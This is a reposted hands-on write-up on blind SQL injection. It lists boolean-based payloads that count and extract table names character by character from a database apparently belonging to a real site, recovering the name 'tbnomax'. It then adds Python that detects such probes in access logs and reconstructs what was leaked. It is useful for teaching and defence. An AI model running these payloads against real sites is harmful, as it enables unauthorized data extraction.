Hands-on 2: Injection

The main page shows no errors regardless of what is entered. Navigating to the page below, however, does produce error messages.

The table list dumped with the UNION-query and error-based methods was incomplete, so boolean-based blind injection is used instead.

/?id=24 and (select count(table_name) from information_schema.tables where table_schema='u9897uwx_kabel') =22 %23  // 22 tables
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),1,1))=116%23    t
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),2,1))=98%23     b
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),3,1))=110%23     n
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),4,1))=111%23    o
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),5,1))=109%23    m
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),6,1))=97%23     a
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),7,1))=120%23   x

/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),8,1))=0%23    // blank, which means the whole table name has been extracted

The last table in the database is tbnomax
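
Seen from the defender's side, requests like the ones above leave a distinctive trail in web access logs. The following added example (not part of the original post) flags that probe pattern and reconstructs what each client was able to confirm. The log tuples, the `demo_db` schema name, the response sizes and the rule that a true condition returns the baseline page size are all assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Probe shape used on this page: ascii(substr((select ... limit ROW,1),POS,1))=CODE
PROBE = re.compile(
    r"ascii\s*\(\s*substr(?:ing)?\s*\(\s*\(\s*select\b.*?\blimit\s+(\d+)\s*,\s*1\s*\)"
    r"\s*,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*=\s*(\d+)",
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample data: (client, request path, response size in bytes).
Q = ("/?id=24+and+ascii(substr((select+table_name+from+information_schema.tables"
     "+where+table_schema='demo_db'+limit+21,1),{},1))={}%23")
SAMPLE_LOG = [
    ("203.0.113.7", "/?id=24", 5120),         # normal page, baseline size
    ("203.0.113.7", Q.format(1, 115), 812),   # condition false
    ("203.0.113.7", Q.format(1, 116), 5120),  # condition true: 't'
    ("203.0.113.7", Q.format(2, 98), 5120),   # condition true: 'b'
    ("203.0.113.7", Q.format(3, 110), 5120),  # condition true: 'n'
    ("198.51.100.4", "/?id=7", 4090),         # unrelated benign client
]


def analyze(log, baseline_size, min_probes=3):
    """Return {client: {row_offset: text confirmed to that client}}.

    Only clients with at least min_probes matching requests are reported.
    A probe is treated as answered 'true' when the response size equals
    baseline_size (assumption about how the application behaves).
    """
    probes = defaultdict(int)
    leaked = defaultdict(lambda: defaultdict(dict))
    for client, path, size in log:
        m = PROBE.search(unquote_plus(path))  # decode %20, +, %23 before matching
        if not m:
            continue
        row, pos, code = map(int, m.groups())
        probes[client] += 1
        if size == baseline_size and code != 0:  # code 0 only marks end of string
            leaked[client][row][pos] = chr(code)
    return {
        client: {row: "".join(ch for _, ch in sorted(chars.items()))
                 for row, chars in leaked[client].items()}
        for client, count in probes.items() if count >= min_probes
    }


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG, baseline_size=5120))
```

The recovered text per row offset shows which schema metadata was exposed, which helps scope the incident. The underlying fix is still a parameterized query for `id`.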

Reposted from blog.csdn.net/WYJ____/article/details/81385325